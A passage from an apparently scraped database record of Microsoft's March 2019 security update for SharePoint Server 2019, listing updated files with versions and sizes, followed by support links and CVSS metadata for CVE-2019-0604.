09:44 \nmysitenavigation.js| sp.ui.mysitenavigation.js| | 2523| 4-Mar-19| 09:44 \nmysiterecommendationsuidebug.js| sp.ui.mysiterecommendations.debug.js| | 14330| 4-Mar-19| 09:44 \nmysiterecommendationsui.js| sp.ui.mysiterecommendations.js| | 7268| 4-Mar-19| 09:44 \npeopledebug.js| sp.ui.people.debug.js| | 87048| 4-Mar-19| 09:45 \npeopledebug.js1| sp.ui.people.debug.js| | 87048| 4-Mar-19| 09:45 \npeople.js| sp.ui.people.js| | 59579| 4-Mar-19| 09:44 \npeople.js1| sp.ui.people.js| | 59579| 4-Mar-19| 09:44 \nspui_persond.js| sp.ui.person.debug.js| | 18230| 4-Mar-19| 09:44 \nspui_person.js| sp.ui.person.js| | 10326| 4-Mar-19| 09:44 \nspui_psd.js| sp.ui.promotedsites.debug.js| | 24862| 4-Mar-19| 09:44 \nspui_ps.js| sp.ui.promotedsites.js| | 15125| 4-Mar-19| 09:44 \nsp.ui.ratings.debug.js| sp.ui.ratings.debug.js| | 20220| 4-Mar-19| 09:44 \nsp.ui.ratings.js| sp.ui.ratings.js| | 11911| 4-Mar-19| 09:44 \nsp.ui.reputation.debug.js| sp.ui.reputation.debug.js| | 42482| 4-Mar-19| 09:44 \nsp.ui.reputation.js| sp.ui.reputation.js| | 25976| 4-Mar-19| 09:45 \nspssoc.js| sp.ui.socialribbon.js| | 20742| 4-Mar-19| 09:44 \nhomeapi.dll_gac| microsoft.sharepoint.homeapi.dll| 16.0.10342.12113| 360584| 4-Mar-19| 09:44 \nhomeapi.dll_isapi| microsoft.sharepoint.homeapi.dll| 16.0.10342.12113| 360584| 4-Mar-19| 09:44 \nportal.dll| microsoft.sharepoint.portal.dll| 16.0.10342.12113| 7002240| 4-Mar-19| 09:19 \nportal.dll_001| microsoft.sharepoint.portal.dll| 16.0.10342.12113| 7002240| 4-Mar-19| 09:19 \nstsapa.dll| microsoft.sharepoint.applicationpages.administration.dll| 16.0.10342.12113| 696976| 4-Mar-19| 09:21 \nwssadmop.dll_0001| microsoft.sharepoint.administrationoperation.dll| 16.0.10342.12113| 1181648| 4-Mar-19| 09:19 \nmicrosoft.sharepoint.health.dll| microsoft.sharepoint.health.dll| 16.0.10342.12113| 144624| 4-Mar-19| 09:20 \nmicrosoft.sharepoint.identitymodel.dll| microsoft.sharepoint.identitymodel.dll| 16.0.10342.12113| 658576| 4-Mar-19| 09:40 \nmicrosoft.sharepoint.client.dll.x64| microsoft.sharepoint.client.dll| 16.0.10342.12113| 862544| 4-Mar-19| 09:28 \nmicrosoft.sharepoint.client.dll_0001.x64| microsoft.sharepoint.client.dll| 16.0.10342.12113| 862544| 4-Mar-19| 09:28 \nmicrosoft.sharepoint.client.phone.dll| microsoft.sharepoint.client.phone.dll| 16.0.10342.12113| 807576| 4-Mar-19| 09:27 \nmicrosoft.sharepoint.client.portable.dll.x64| microsoft.sharepoint.client.portable.dll| 16.0.10342.12113| 823160| 4-Mar-19| 09:27 \nmicrosoft.sharepoint.client.portable.dll_gac.x64| microsoft.sharepoint.client.portable.dll| 16.0.10342.12113| 823160| 4-Mar-19| 09:27 \nmicrosoft.sharepoint.client.serverruntime.dll| microsoft.sharepoint.client.serverruntime.dll| 16.0.10342.12113| 749272| 4-Mar-19| 09:28 \nmicrosoft.sharepoint.client.serverruntime.dll_0001| microsoft.sharepoint.client.serverruntime.dll| 16.0.10342.12113| 749272| 4-Mar-19| 09:28 \nmicrosoft.sharepoint.client.silverlight.dll.x64| microsoft.sharepoint.client.silverlight.dll| 16.0.10342.12113| 806792| 4-Mar-19| 09:26 \ncontextinfo.dll_0001| microsoft.sharepoint.context.dll| 16.0.10342.12113| 56440| 4-Mar-19| 09:27 \nmicrosoft.sharepoint.serverstub.dll| microsoft.sharepoint.serverstub.dll| 16.0.10342.12113| 2897120| 4-Mar-19| 09:27 \noffprsx.dll| offparser.dll| 16.0.10342.12113| 2193040| 4-Mar-19| 09:40 \nstslib.dll_0001| microsoft.sharepoint.library.dll| 16.0.10342.12113| 238216| 4-Mar-19| 09:40 \nowssvr.dll_0001| owssvr.dll| 16.0.10342.12113| 6908040| 4-Mar-19| 09:40 \nmicrosoft.sharepoint.powershell.dll_0001| microsoft.sharepoint.powershell.dll| 16.0.10342.12113| 1074320| 4-Mar-19| 09:19 \nmicrosoft.sharepoint.powershell.intl.dll| microsoft.sharepoint.powershell.intl.dll| 16.0.10342.12113| 105616| 4-Mar-19| 09:20 \npsconfig.exe| psconfig.exe| 16.0.10342.12113| 547024| 4-Mar-19| 09:40 \npsconfigui.exe| psconfigui.exe| 16.0.10342.12113| 818600| 4-Mar-19| 09:40 \nstsom.dll| microsoft.sharepoint.dll| 16.0.10342.12113| 38536808| 4-Mar-19| 09:35 \nstsom.dll_0001| microsoft.sharepoint.dll| 16.0.10342.12113| 38536808| 4-Mar-19| 09:35 \nstsomdr.dll| microsoft.sharepoint.intl.dll| 16.0.10342.12113| 1417568| 4-Mar-19| 09:35 \nstsap.dll| microsoft.sharepoint.applicationpages.dll| 16.0.10342.12113| 2454752| 4-Mar-19| 09:43 \nstssoap.dll| stssoap.dll| 16.0.10342.12113| 784528| 4-Mar-19| 09:29 \nsubsetproxy.dll_0001| microsoft.sharepoint.subsetproxy.dll| 16.0.10342.12113| 1148640| 4-Mar-19| 09:40 \nsubsetshim.dll_0001| microsoft.sharepoint.dll| 16.900.rup.rpr| 2455680| 4-Mar-19| 09:23 \napplications.asx_0014| applications.aspx| | 3954| 13-Feb-19| 11:14 \napps.asx_0014| apps.aspx| | 3930| 13-Feb-19| 11:15 \nbackups.asx_0014| backups.aspx| | 3939| 13-Feb-19| 11:15 \nconfigurationwizards.asx_0014| configurationwizards.aspx| | 3978| 13-Feb-19| 11:15 \ndefault.asx_0014| default.aspx| | 5396| 13-Feb-19| 01:51 \ngenappsettings.asx_0014| generalapplicationsettings.aspx| | 3997| 13-Feb-19| 11:15 \nmonitoring.asx_0014| monitoring.aspx| | 3948| 13-Feb-19| 11:15 \no365config.asx_0015| office365configuration.aspx| | 5136| 13-Feb-19| 11:14 \nsecurity.asx_0014| security.aspx| | 3942| 13-Feb-19| 11:16 \nsysset.asx_0014| systemsettings.aspx| | 3960| 13-Feb-19| 01:51 \nupgandmig.asx_0014| upgradeandmigration.aspx| | 3975| 13-Feb-19| 11:15 \ndip.js| dip.js| | 50487| 15-Feb-19| 10:48 \ndip.js_14| dip.js| | 50487| 15-Feb-19| 10:48 \naccreqctl.debug.js| accessrequestscontrol.debug.js| | 20641| 4-Mar-19| 09:40 \naccreqctl.js| accessrequestscontrol.js| | 11661| 4-Mar-19| 09:40 \naccreqviewtmpl.debug.js| accessrequestsviewtemplate.debug.js| | 50013| 4-Mar-19| 09:40 \naccreqviewtmpl.js| accessrequestsviewtemplate.js| | 22933| 4-Mar-19| 09:40 \nappcatalogfieldtemplate.debug.js| appcatalogfieldtemplate.debug.js| | 9638| 4-Mar-19| 09:40 \nappcatalogfieldtemplate.js| appcatalogfieldtemplate.js| | 3695| 4-Mar-19| 09:40 \nappdeveloperdash.debug.js| appdeveloperdash.debug.js| | 23162| 4-Mar-19| 09:40 \nappdeveloperdash.js| appdeveloperdash.js| | 11552| 4-Mar-19| 09:40 \napprequestmanagefieldtemplate.debug.js| apprequestmanagefieldtemplate.debug.js| | 2771| 4-Mar-19| 09:40 \napprequestmanagefieldtemplate.js| apprequestmanagefieldtemplate.js| | 1476| 4-Mar-19| 09:41 \nautofill.debug.js| autofill.debug.js| | 20542| 4-Mar-19| 09:40 \nautofill.js| autofill.js| | 11562| 4-Mar-19| 09:40 \nautohostedlicensingtemplates.debug.js| autohostedlicensingtemplates.debug.js| | 21187| 4-Mar-19| 09:40 \nautohostedlicensingtemplates.js| autohostedlicensingtemplates.js| | 8989| 4-Mar-19| 09:40 \nbform.debug.js| bform.debug.js| | 460795| 4-Mar-19| 09:40 \nbform.js| bform.js| | 259449| 4-Mar-19| 09:40 \nblank.debug.js| blank.debug.js| | 755| 4-Mar-19| 09:40 \nblank.js| blank.js| | 456| 4-Mar-19| 09:40 \ncallout.debug.js| callout.debug.js| | 92039| 4-Mar-19| 09:40 \ncallout.js| callout.js| | 29823| 4-Mar-19| 09:40 \nchoicebuttonfieldtemplate.debug.js| choicebuttonfieldtemplate.debug.js| | 6382| 4-Mar-19| 09:40 \nchoicebuttonfieldtemplate.js| choicebuttonfieldtemplate.js| | 2743| 4-Mar-19| 09:40 \nclientforms.debug.js| clientforms.debug.js| | 155351| 4-Mar-19| 09:40 \nclientforms.js| clientforms.js| | 78857| 4-Mar-19| 09:40 \nclientpeoplepicker.debug.js| clientpeoplepicker.debug.js| | 83399| 4-Mar-19| 09:40 \nclientpeoplepicker.js| clientpeoplepicker.js| | 44298| 4-Mar-19| 09:40 \nclientrenderer.debug.js| clientrenderer.debug.js| | 30681| 4-Mar-19| 09:40 \nclientrenderer.js| clientrenderer.js| | 12960| 4-Mar-19| 09:40 \nclienttemplates.debug.js| clienttemplates.debug.js| | 397742| 4-Mar-19| 09:40 \nclienttemplates.js| clienttemplates.js| | 203209| 4-Mar-19| 09:40 \ncommonvalidation.debug.js| commonvalidation.debug.js| | 6758| 4-Mar-19| 09:40 \ncomval.js| commonvalidation.js| | 4224| 4-Mar-19| 09:40 \ncore.debug.js| core.debug.js| | 955606| 4-Mar-19| 09:40 \ncore.js_0001| core.js| | 506886| 4-Mar-19| 09:40 \ncreatesharedfolderdialog.debug.js| createsharedfolderdialog.debug.js| | 42912| 4-Mar-19| 09:40 \ncreatesharedfolderdialog.js| createsharedfolderdialog.js| | 18732| 4-Mar-19| 09:41 \ndatepicker.debug.js| datepicker.debug.js| | 160256| 4-Mar-19| 09:40 \ndatepick.js| datepicker.js| | 71408| 4-Mar-19| 09:40 \ndesigngallery.debug.js| designgallery.debug.js| | 47390| 4-Mar-19| 09:41 \ndesigngallery.js| designgallery.js| | 29175| 4-Mar-19| 09:40 \ndevdash.debug.js| devdash.debug.js| | 89841| 4-Mar-19| 09:40 \ndevdash.js| devdash.js| | 38404| 4-Mar-19| 09:40 \ndragdrop.debug.js| dragdrop.debug.js| | 237831| 4-Mar-19| 09:40 \ndragdrop.js| dragdrop.js| | 122518| 4-Mar-19| 09:40 \nentityeditor.debug.js| entityeditor.debug.js| | 73995| 4-Mar-19| 09:40 \nentityeditor.js| entityeditor.js| | 38999| 4-Mar-19| 09:40 \nfilepreview.debug.js| filepreview.debug.js| | 25986| 4-Mar-19| 09:40 \nfilepreview.js| filepreview.js| | 14046| 4-Mar-19| 09:41 \nfoldhyperlink.debug.js| foldhyperlink.debug.js| | 3924| 4-Mar-19| 09:40 \nfoldhyperlink.js| foldhyperlink.js| | 1863| 4-Mar-19| 09:40 \nform.debug.js| form.debug.js| | 241306| 4-Mar-19| 09:40 \nform.js| form.js| | 129252| 4-Mar-19| 09:40 \nganttscript.debug.js| ganttscript.debug.js| | 9384| 4-Mar-19| 09:40 \nganttscr.js| ganttscript.js| | 5100| 4-Mar-19| 09:40 \ngeolocationfieldtemplate.debug.js| geolocationfieldtemplate.debug.js| | 40968| 4-Mar-19| 09:41 \ngeolocationfieldtemplate.js| geolocationfieldtemplate.js| | 15413| 4-Mar-19| 09:40 \ngroupboard.debug.js| groupboard.debug.js| | 16339| 4-Mar-19| 09:40 \ngroupboard.js| groupboard.js| | 9550| 4-Mar-19| 09:40 \ngroupeditempicker.debug.js| groupeditempicker.debug.js| | 21014| 4-Mar-19| 09:40 \ngip.js| groupeditempicker.js| | 12057| 4-Mar-19| 09:40 \nhierarchytaskslist.debug.js| hierarchytaskslist.debug.js| | 60796| 4-Mar-19| 09:40 \nhierarchytaskslist.js| hierarchytaskslist.js| | 20088| 4-Mar-19| 09:40 \nimglib.debug.js| imglib.debug.js| | 91322| 4-Mar-19| 09:40 \nimglib.js| imglib.js| | 53907| 4-Mar-19| 09:40 \ninit.debug.js| init.debug.js| | 626534| 4-Mar-19| 09:23 \ninit.js_0001| init.js| | 303047| 4-Mar-19| 09:40 \ninplview.debug.js| inplview.debug.js| | 155120| 4-Mar-19| 09:40 \ninplview.js| inplview.js| | 79291| 4-Mar-19| 09:40 \njsgrid.debug.js| jsgrid.debug.js| | 1185607| 4-Mar-19| 09:40 \njsgrid.gantt.debug.js| jsgrid.gantt.debug.js| | 110109| 4-Mar-19| 09:40 \njsgrid.gantt.js| jsgrid.gantt.js| | 42306| 4-Mar-19| 09:41 \njsgrid.js| jsgrid.js| | 444681| 4-Mar-19| 09:40 \nlanguagepickercontrol.js| languagepickercontrol.js| | 11518| 4-Mar-19| 09:40 \nlistview.debug.js| listview.debug.js| | 930411| 4-Mar-19| 09:40 \nlistview.js| listview.js| | 399999| 4-Mar-19| 09:41 \nmapviewtemplate.debug.js| mapviewtemplate.debug.js| | 38394| 4-Mar-19| 09:40 \nmapviewtemplate.js| mapviewtemplate.js| | 15544| 4-Mar-19| 09:40 \nmenu.debug.js| menu.debug.js| | 103516| 4-Mar-19| 09:40 \nmenu.js_0001| menu.js| | 52561| 4-Mar-19| 09:40 \nmountpt.debug.js| mountpoint.debug.js| | 13632| 4-Mar-19| 09:40 \nmountpt.js| mountpoint.js| | 6213| 4-Mar-19| 09:40 \nmquery.debug.js| mquery.debug.js| | 60340| 4-Mar-19| 09:40 \nmquery.js| mquery.js| | 22616| 4-Mar-19| 09:40 \nms.rte.debug.js| ms.rte.debug.js| | 714303| 4-Mar-19| 09:40 \nms.rte.js| ms.rte.js| | 401121| 4-Mar-19| 09:40 \noffline.debug.js| offline.debug.js| | 22145| 4-Mar-19| 09:40 \noffline.js| offline.js| | 11376| 4-Mar-19| 09:40 \nows.debug.js| ows.debug.js| | 714258| 4-Mar-19| 09:40 \nows.js| ows.js| | 376947| 4-Mar-19| 09:40 \nowsbrows.debug.js| owsbrows.debug.js| | 24730| 4-Mar-19| 09:40 \nowsbrows.js| owsbrows.js| | 13193| 4-Mar-19| 09:40 \npickerhierarchycontrol.js| pickerhierarchycontrol.js| | 84678| 4-Mar-19| 09:40 \nquicklaunch.debug.js| quicklaunch.debug.js| | 135522| 4-Mar-19| 09:40 \nquicklaunch.js| quicklaunch.js| | 74050| 4-Mar-19| 09:41 \nradiobuttonwithchildren.js| radiobuttonwithchildren.js| | 3557| 4-Mar-19| 09:40 \nroamingapps.debug.js| roamingapps.debug.js| | 55031| 4-Mar-19| 09:40 \nroamingapps.js| roamingapps.js| | 21855| 4-Mar-19| 09:40 \nsharing.debug.js| sharing.debug.js| | 322361| 4-Mar-19| 09:40 \nsharing.js| sharing.js| | 135350| 4-Mar-19| 09:40 \nsharingmodern.debug.js| sharingmodern.debug.js| | 18196| 4-Mar-19| 09:40 \nsharingmodern.js| sharingmodern.js| | 5807| 4-Mar-19| 09:40 \nsinglesignon.debug.js| singlesignon.debug.js| | 17059| 4-Mar-19| 09:40 \nsinglesignon.js| singlesignon.js| | 6062| 4-Mar-19| 09:40 \nsiteupgrade.debug.js| siteupgrade.debug.js| | 1693| 4-Mar-19| 09:40 \nsiteupgrade.debug.js_14| siteupgrade.debug.js| | 1693| 4-Mar-19| 09:40 \nsiteupgrade.js| siteupgrade.js| | 1121| 4-Mar-19| 09:41 \nsiteupgrade.js_14| siteupgrade.js| | 1121| 4-Mar-19| 09:41 \nsp.accessibility.debug.js| sp.accessibility.debug.js| | 34811| 4-Mar-19| 09:40 \nsp.accessibility.js| sp.accessibility.js| | 21843| 4-Mar-19| 09:40 \nsp.core.debug.js| sp.core.debug.js| | 165966| 4-Mar-19| 09:23 \nsp.core.js| sp.core.js| | 87863| 4-Mar-19| 09:40 \nsp.datetimeutil.debug.js| sp.datetimeutil.debug.js| | 114089| 4-Mar-19| 09:40 \nsp.datetimeutil.js| sp.datetimeutil.js| | 65780| 4-Mar-19| 09:40 \nsp.debug.js| sp.debug.js| | 1706283| 4-Mar-19| 09:40 \nsp.exp.debug.js| sp.exp.debug.js| | 41182| 4-Mar-19| 09:41 \nsp.exp.js| sp.exp.js| | 24500| 4-Mar-19| 09:40 \nsp.init.debug.js| sp.init.debug.js| | 57831| 4-Mar-19| 09:40 \nsp.init.js| sp.init.js| | 32954| 4-Mar-19| 09:40 \nsp.js| sp.js| | 1044863| 4-Mar-19| 09:40 \nspmap.debug.js| sp.map.debug.js| | 15759| 4-Mar-19| 09:40 \nspmap.js| sp.map.js| | 8533| 4-Mar-19| 09:40 \nsppageinstr.debug.js| sp.pageinstrumentation.debug.js| | 1925| 4-Mar-19| 09:40 \nsppageinstr.js| sp.pageinstrumentation.js| | 1397| 4-Mar-19| 09:40 \nsp.requestexecutor.debug.js| sp.requestexecutor.debug.js| | 100405| 4-Mar-19| 09:40 \nsp.requestexecutor.js| sp.requestexecutor.js| | 63698| 4-Mar-19| 09:40 \nsp.ribbon.debug.js| sp.ribbon.debug.js| | 361474| 4-Mar-19| 09:40 \nsp.ribbon.js| sp.ribbon.js| | 222919| 4-Mar-19| 09:41 \nsp.runtime.debug.js| sp.runtime.debug.js| | 197022| 4-Mar-19| 09:24 \nsp.runtime.js| sp.runtime.js| | 115686| 4-Mar-19| 09:40 \nsp.simpleloggermobile.debug.js| sp.simpleloggermobile.debug.js| | 40931| 4-Mar-19| 09:40 \nsp.simpleloggermobile.js| sp.simpleloggermobile.js| | 20444| 4-Mar-19| 09:40 \nsp.storefront.debug.js| sp.storefront.debug.js| | 440500| 4-Mar-19| 09:40 \nsp.storefront.js| sp.storefront.js| | 296738| 4-Mar-19| 09:40 \nsp.ui.admin.debug.js| sp.ui.admin.debug.js| | 18904| 4-Mar-19| 09:40 \nsp.ui.admin.js| sp.ui.admin.js| | 11613| 4-Mar-19| 09:40 \nsp.ui.allapps.debug.js| sp.ui.allapps.debug.js| | 45304| 4-Mar-19| 09:40 \nsp.ui.allapps.js| sp.ui.allapps.js| | 27974| 4-Mar-19| 09:40 \nsp.ui.applicationpages.calendar.debug.js| sp.ui.applicationpages.calendar.debug.js| | 278348| 4-Mar-19| 09:40 \nsp.ui.applicationpages.calendar.js| sp.ui.applicationpages.calendar.js| | 143409| 4-Mar-19| 09:40 \nsp.ui.applicationpages.debug.js| sp.ui.applicationpages.debug.js| | 11283| 4-Mar-19| 09:40 \nsp.ui.applicationpages.js| sp.ui.applicationpages.js| | 7684| 4-Mar-19| 09:41 \nsp.ui.bdcadminpages.debug.js| sp.ui.bdcadminpages.debug.js| | 16634| 4-Mar-19| 09:40 \nsp.ui.bdcadminpages.js| sp.ui.bdcadminpages.js| | 11652| 4-Mar-19| 09:40 \nspblogd.js| sp.ui.blogs.debug.js| | 51882| 4-Mar-19| 09:40 \nspblog.js| sp.ui.blogs.js| | 31204| 4-Mar-19| 09:40 \nsp.ui.combobox.debug.js| sp.ui.combobox.debug.js| | 100153| 4-Mar-19| 09:40 \nsp.ui.combobox.js| sp.ui.combobox.js| | 52058| 4-Mar-19| 09:40 \nsp.ui.controls.debug.js| sp.ui.controls.debug.js| | 58556| 4-Mar-19| 09:40 \nsp.ui.controls.js| sp.ui.controls.js| | 39729| 4-Mar-19| 09:40 \nsp.ui.dialog.debug.js| sp.ui.dialog.debug.js| | 75579| 4-Mar-19| 09:40 \nsp.ui.dialog.js| sp.ui.dialog.js| | 44114| 4-Mar-19| 09:40 \nspdiscd.js| sp.ui.discussions.debug.js| | 136669| 4-Mar-19| 09:40 \nspdisc.js| sp.ui.discussions.js| | 81747| 4-Mar-19| 09:40 \nspimgcd.js| sp.ui.imagecrop.debug.js| | 28399| 4-Mar-19| 09:40 \nspimgc.js| sp.ui.imagecrop.js| | 28399| 4-Mar-19| 09:40 \nspui_rid.js| sp.ui.relateditems.debug.js| | 29224| 4-Mar-19| 09:40 \nspui_ri.js| sp.ui.relateditems.js| | 18378| 4-Mar-19| 09:40 \nsp.ui.rte.debug.js| sp.ui.rte.debug.js| | 355959| 4-Mar-19| 09:40 \nsp.ui.rte.js| sp.ui.rte.js| | 217946| 4-Mar-19| 09:40 \nsp.ui.tileview.debug.js| sp.ui.tileview.debug.js| | 100921| 4-Mar-19| 09:40 \nsp.ui.tileview.js| sp.ui.tileview.js| | 61802| 4-Mar-19| 09:40 \nspui_tld.js| sp.ui.timeline.debug.js| | 488181| 4-Mar-19| 09:40 \nspui_tl.js| sp.ui.timeline.js| | 265639| 4-Mar-19| 09:40 \nspgantt.debug.js| spgantt.debug.js| | 192623| 4-Mar-19| 09:41 \nspgantt.js| spgantt.js| | 69727| 4-Mar-19| 09:40 \nspgridview.debug.js| spgridview.debug.js| | 7876| 4-Mar-19| 09:40 \nspgridvw.js| spgridview.js| | 4903| 4-Mar-19| 09:40 \nstart.debug.js| start.debug.js| | 185210| 4-Mar-19| 09:40 \nstart.js| start.js| | 101324| 4-Mar-19| 09:40 \nsuitelinks.debug.js| suitelinks.debug.js| | 32319| 4-Mar-19| 09:40 \nsuitelnk.js| suitelinks.js| | 13508| 4-Mar-19| 09:40 \ntimecard.debug.js| timecard.debug.js| | 37455| 4-Mar-19| 09:41 \ntimecard.js| timecard.js| | 21192| 4-Mar-19| 09:40 \nwpadder.debug.js| wpadder.debug.js| | 52865| 4-Mar-19| 09:40 \nwpadder.js| wpadder.js| | 33270| 4-Mar-19| 09:40 \nwpcm.debug.js| wpcm.debug.js| | 7521| 4-Mar-19| 09:40 \nwpcm.js| wpcm.js| | 3849| 4-Mar-19| 09:40 \nstore.sql| store.sql| | 8073262| 15-Feb-19| 10:41 \nstore.xml| store.xml| | 8915732| 4-Mar-19| 09:44 \nstoreazure.xml| store_azure.xml| | 8915732| 4-Mar-19| 09:44 \nappassoc.asx| applicationassociations.aspx| | 5504| 13-Feb-19| 11:33 \nauthen.asx| authentication.aspx| | 13965| 13-Feb-19| 11:33 \nblkftyp.asx| blockedfiletype.aspx| | 4282| 13-Feb-19| 11:33 \ndftcntdb.asx| defaultcontentdb.aspx| | 6243| 13-Feb-19| 11:33 \nhealrepo.asx| healthreport.aspx| | 6499| 13-Feb-19| 02:12 \nincemail.asx| incomingemail.aspx| | 22663| 13-Feb-19| 11:33 \nirmadmin.asx| irmadmin.aspx| | 8804| 13-Feb-19| 11:33 \nlogusage.asx| logusage.aspx| | 14555| 13-Feb-19| 11:33 \nmetrics.asx| metrics.aspx| | 15403| 13-Feb-19| 11:32 \nofadmin.asx| officialfileadmin.aspx| | 13839| 13-Feb-19| 11:33 \nprivacy.asx| privacy.aspx| | 10182| 13-Feb-19| 11:33 \nslctcfaz.asx| selectcrossfirewallaccesszone.aspx| | 5643| 13-Feb-19| 11:33 \nsvcappcn.asx| serviceapplicationconnect.aspx| | 5027| 13-Feb-19| 11:33 \nsiteex.asx| siteandlistexport.aspx| | 12538| 13-Feb-19| 11:33 \nsitebaks.asx| sitebackuporexportstatus.aspx| | 10389| 13-Feb-19| 11:32 \nsitecbac.asx| sitecollectionbackup.aspx| | 10764| 13-Feb-19| 11:33 \nsitequot.asx| sitequota.aspx| | 24455| 13-Feb-19| 11:32 \nspscrstg.asx_0002| spsecuritysettings.aspx| | 7731| 13-Feb-19| 02:11 \nunatcdb.asx| unattacheddbselect.aspx| | 6322| 13-Feb-19| 11:32 \nuser_solution.asx| usersolutions.aspx| | 9571| 13-Feb-19| 11:33 \nversions.asx| versions.aspx| | 37378| 13-Feb-19| 11:30 \nofadmin.aspx_tenantadmin| ta_officialfileadmin.aspx| | 11593| 13-Feb-19| 11:23 \nowstimer.exe_0001| owstimer.exe| 16.0.10342.12113| 86640| 4-Mar-19| 09:40 \nmicrosoft.vroom.sharepoint.dll| microsoft.vroom.sharepoint.dll| 16.0.10342.12113| 631952| 4-Mar-19| 09:21 \nspwriter.exe_0001| spwriter.exe| 16.0.10342.12113| 58208| 4-Mar-19| 09:40 \nstswel.dll| stswel.dll| 16.0.10342.12113| 3684496| 4-Mar-19| 09:33 \nstswfacb.dll| microsoft.sharepoint.workflowactions.dll| 16.0.10342.12113| 320888| 4-Mar-19| 09:45 \nstswfact.dll| microsoft.sharepoint.workflowactions.dll| 16.0.10342.12113| 320888| 4-Mar-19| 09:45 \nsts.workflows.dll| microsoft.sharepoint.workflows.dll| 16.0.10342.12113| 74088| 4-Mar-19| 09:34 \nie50up.debug.js| ie50up.debug.js| | 155104| 4-Mar-19| 09:34 \nie50up.js| ie50up.js| | 81715| 4-Mar-19| 09:33 \nie55up.debug.js| ie55up.debug.js| | 154298| 4-Mar-19| 09:33 \nie55up.js| ie55up.js| | 81176| 4-Mar-19| 09:33 \nnon_ie.debug.js| non_ie.debug.js| | 102961| 4-Mar-19| 09:34 \nnon_ie.js| non_ie.js| | 60388| 4-Mar-19| 09:33 \nbpstd.debug.js| bpstd.debug.js| | 8194| 4-Mar-19| 09:26 \nbpstd.js| bpstd.js| | 4668| 4-Mar-19| 09:24 \nctp.debug.js| ctp.debug.js| | 7940| 4-Mar-19| 09:25 \nctp.js| ctp.js| | 4223| 4-Mar-19| 09:26 \ncvtp.debug.js| cvtp.debug.js| | 5066| 4-Mar-19| 09:25 \ncvtp.js| cvtp.js| | 2704| 4-Mar-19| 09:23 \nitp.debug.js| itp.debug.js| | 13120| 4-Mar-19| 09:23 \nitp.js| itp.js| | 9814| 4-Mar-19| 09:24 \nxtp.debug.js| xtp.debug.js| | 3605| 4-Mar-19| 09:25 \nxtp.js| xtp.js| | 1801| 4-Mar-19| 09:24 \nosrv_sandbox.dll| microsoft.office.server.sandbox.dll| 16.0.10342.12113| 769200| 4-Mar-19| 09:41 \nmicrosoft.office.web.sandbox.dll| microsoft.office.web.sandbox.dll| 16.0.10342.12113| 769408| 4-Mar-19| 09:41 \nsts_sandbox.dll| microsoft.sharepoint.sandbox.dll| 16.0.10342.12113| 769408| 4-Mar-19| 09:40 \nvisfilt.dll.x64| visfilt.dll| 16.0.10342.12113| 6398088| 4-Mar-19| 09:34 \nvisioserver.vutils.dll| vutils.dll| 16.0.10342.12113| 3238488| 4-Mar-19| 09:28 \nsts_odspnextnewux1efa61166de43c71668b949c99f0686b| listitemformdeferred.js| | | 13-Feb-19| 07:38 \nsts_odspnextnewuxbe3313501487c79fe05e26c262deaaa9| createsite.json| | | 13-Feb-19| 07:38 \nsts_odspnextnewux73bf67ca708ed0b9bbee05da7d4ab95b| listitemform.json| | | 13-Feb-19| 07:38 \nodbonedrive.json| odbonedrive.json| | | 13-Feb-19| 07:38 \nsts_odspnextnewux0caa67c96a8a488d88a0b64e58cf6219| recyclebin.json| | | 13-Feb-19| 07:38 \nsts_odspnextnewux82ec74261e20424f9653d60d8846afce| sitehub.json| | | 13-Feb-19| 07:38 \nsts_odspnextnewuxc2feb86763199de55a499729d395cb83| splist.json| | | 13-Feb-19| 07:38 \nsts_odspnextnewux8c0380eb9a20542616b7c1feeac0f995| odbonedrive.js| | | 13-Feb-19| 07:38 \nsts_odspnextnewuxee5697f761f94ca16ffd86a4ef02d1a8| recyclebindeferred.js| | | 13-Feb-19| 07:39 \nsts_odspnextnewuxb8931dbbdb97beb330defb6bad1ae332| sitehubdeferred.js| | | 13-Feb-19| 07:39 \nsts_odspnextnewux75199cdb9d900d5ff11f7782399cb17f| splistdeferred.js| | | 13-Feb-19| 07:39 \nsts_odspnextnewux30484b0717864b439efabcb4caaf6538| spoapp.js| | | 13-Feb-19| 07:39 \nsts_odspnextnewuxb680d3a8e2013810dae29dafe4d75340| spofiles.js| | | 13-Feb-19| 07:39 \ncui.debug.js| cui.debug.js| | 657986| 4-Mar-19| 09:41 \ncui.js| cui.js| | 364466| 4-Mar-19| 09:40 \nxui.debug.js| xui.debug.js| | 45549| 4-Mar-19| 09:40 \nxui.js| xui.js| | 18954| 4-Mar-19| 09:40 \nwac.word.sword.dll| sword.dll| 16.0.10342.12113| 12804928| | \nwdsrv.conversion.sword.dll| sword.dll| 16.0.10342.12113| 12804928| 4-Mar-19| 09:36 \ntranslationqueue.sql| translationqueue.sql| | 53164| 4-Mar-19| 09:20 \nifswfe.dll| microsoft.office.infopath.server.dll| 16.0.10342.12113| 3183728| 4-Mar-19| 09:31 \nifswfepriv.dll| microsoft.office.infopath.server.dll| 16.0.10342.12113| 3183728| 4-Mar-19| 09:31 \noffxml.dll| offxml.dll| 16.0.10342.12113| 427648| 4-Mar-19| 09:44 \n \nHow to get help and support for this security updateHelp for installing updates: [Protect yourself online](<https://www.microsoft.com/safety/pc-security/updates.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Security](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-03-12T00:00:00", "type": "mskb", "title": "Description of the security update for SharePoint Server 2019: March 12, 2019", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604"], "modified": "2019-03-12T00:00:00", "id": 